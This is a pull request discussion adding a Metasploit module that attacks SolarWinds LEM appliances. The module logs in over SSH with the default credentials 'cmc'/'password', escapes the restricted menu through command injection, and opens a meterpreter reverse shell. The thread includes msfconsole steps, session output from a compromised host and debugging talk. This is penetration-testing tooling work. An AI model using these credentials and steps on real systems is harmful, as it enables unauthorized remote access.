Add module SolarWind LEM Default SSH Password Remote Code Execution

[mdisec]

This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/linux/ssh/solarwind_lem_exec
• set RHOST <YOUR_TARGET>
• python/meterpreter/reverse_tcp is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.
• set LHOST <LOCAL IP>
• exploit and then verify the following output.

msf exploit(solarwind_lem_exec) > exploit 

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] 12.0.0.154:32022 - Attempt to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to 12.0.0.154
[*] Meterpreter session 3 opened (12.0.0.1:4444 -> 12.0.0.154:43361) at 2017-03-17 21:59:05 +0300
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.

• session -i 1 and then verify the following output.

msf exploit(solarwind_lem_exec) > sessions -i 3 
[*] Starting interaction with 3...

meterpreter > getuid
Server username: cmc
meterpreter > 

Need backup!

Need your help in order to figure out why I'm getting Exploit failed: Errno::EBADF Bad file descriptorerror even session is created. There is also way to escalate privileges to root but all the function that I am calling through session such as cmd_exec or session.shell_command_token is not working at def on_new_session(session)

[dmohanty-r7]

Exploit works as advertised for me:

msf > use exploit/linux/ssh/solarwind_lem_exec
msf exploit(solarwind_lem_exec) > set RHOST *.*.*.*
RHOST => *.*.*.*
msf exploit(solarwind_lem_exec) > set LHOST *.*.*.*
LHOST => *.*.*.*
msf exploit(solarwind_lem_exec) > exploit

[*] Started reverse TCP handler on *.*.*.*:4444
[*] *.*.*.*:32022 - Attempting to login...
[+] SSH connection is established.
[*] Requesting pty... We need it in order to interact with menuing system.
[+] Pty successfully obtained.
[*] Requesting a shell.
[+] Remote shell successfully obtained.
[+] Step 1 is done. Managed to access terminal menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 2 is done. Managed to select 'service' sub menu.
[+] Step 3 is done. Managed to start 'restrictssh' function.
[+] Step 4 is done. We are going to try escape from jail shell.
[+] Sweet..! Escaped from jail.
[*] Delivering payload...
[*] Sending stage (38651 bytes) to *.*.*.*
[*] Meterpreter session 1 opened (*.*.*.*:4444 -> *.*.*.*:59193) at 2017-03-17 16:47:17 -0500
[-] Exploit failed: Errno::EBADF Bad file descriptor
[*] Exploit completed, but no session was created.
msf exploit(solarwind_lem_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
meterpreter > ls
Listing: /usr/local/contego
===========================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100600/rw-------  371     fil   2017-03-17 16:47:17 -0500  .bash_history
100774/rwxrwxr--  176     fil   2016-08-19 07:13:49 -0500  .bash_profile
100774/rwxrwxr--  46      fil   2016-08-19 07:13:49 -0500  .bashrc
40755/rwxr-xr-x   4096    dir   2016-08-19 07:13:52 -0500  .oracle_jre_usage
100660/rw-rw----  1024    fil   2016-08-19 07:13:49 -0500  .rnd
100664/rw-rw-r--  0       fil   2016-08-19 07:13:49 -0500  banner.txt
42775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  database
100664/rw-rw-r--  2572    fil   2017-03-17 16:32:40 -0500  error.log
100664/rw-rw-r--  79508   fil   2017-03-17 16:32:44 -0500  hsql.log
40775/rwxrwxr-x   16384   dir   2016-08-19 07:13:52 -0500  lib
100664/rw-rw-r--  108605  fil   2017-03-17 16:48:47 -0500  manager.log
100664/rw-rw-r--  2183    fil   2017-03-17 16:47:17 -0500  mgrconfig.log
42775/rwxrwxr-x   4096    dir   2016-08-19 07:13:53 -0500  reset
42775/rwxrwxr-x   4096    dir   2017-03-17 16:32:55 -0500  run
42775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  scripts
40775/rwxrwxr-x   4096    dir   2016-08-19 07:14:16 -0500  tools

meterpreter >

Looking into Exploit failed: Errno::EBADF Bad file descriptor bug

[dmohanty-r7]

It would probably be more appropriate to write this as an auxiliary login scanner much like auxiliary/scanner/ssh/ssh_login https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/ssh_login.rb, or auxiliary/scanner/ssh/ssh_login/karah_login https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssh/karaf_login.rb

Although, not sure, since you have the additional steps where you "break out of the jail".

[mdisec]

@dmohanty-r7 I was planning go with auxiliary at the beginning but I decided to go with exploit module due to exploitation of menuing system vulnerability that actually helps us to reach terminal. If we managed to solve that bug, I would also add privileges escalation steps as well. Is it okey to create a session and then escalate privileges within same aux module ?

[wvu]

@mmetince: Bro, you need to stop finding so many bugs. You're giving us too many modules. ;)

[wchen-r7]

I agree with @mmetince that having this as an exploit is perfectly fine. However, I would probably consider adding the default username and password to a wordlist in the data/wordlists directory, that way the ssh_login auxiliary can use it.

I think this PR is probably good to land as soon as there is some module documentation.

Nice work @mmetince & @dmohanty-r7 :-)

[mdisec]

Should I add these credential to the data/wordlists within this PR or should I send another PR ? @wchen-r7

I just need @dmohanty-r7 to solve Exploit failed: Errno::EBADF Bad file descriptor issue before landing this one. I've spent almost a day on it but couldn't figured it out why we're getting this error.

[wchen-r7]

@mmetince Either way works fine :-) Whatever is easier for you :-)

[mdisec]

• Adding module doc is done.
• Adding credentials to the wordlist is done. Please verify that the added wordlist file is the proper one :-) ?

Now I just want to know a root cause of Exploit failed: Errno::EBADF Bad file descriptor error :-) Any news from @dmohanty-r7 ur side ?

[wvu]

I'm working on it with @dmohanty-r7. Got some leads. :)

[h00die]

btw, docs look good to me.

[dmohanty-r7]

@mmetince We wrapped the ssh.loop unless session_created? in a begin/rescue and logged the error. This produces expected behavior. Thank you so much for the module. Also thank you @h00die for the look over the docs ^.^

[wvu]

🍰

[dmohanty-r7]

Release Notes

The exploit/linux/ssh/solarwinds_lem_exec module has been added to the framework. It leverages the default SSH credentials of a SolarWind LEM appliance and uses command injection to break out of its defined jail.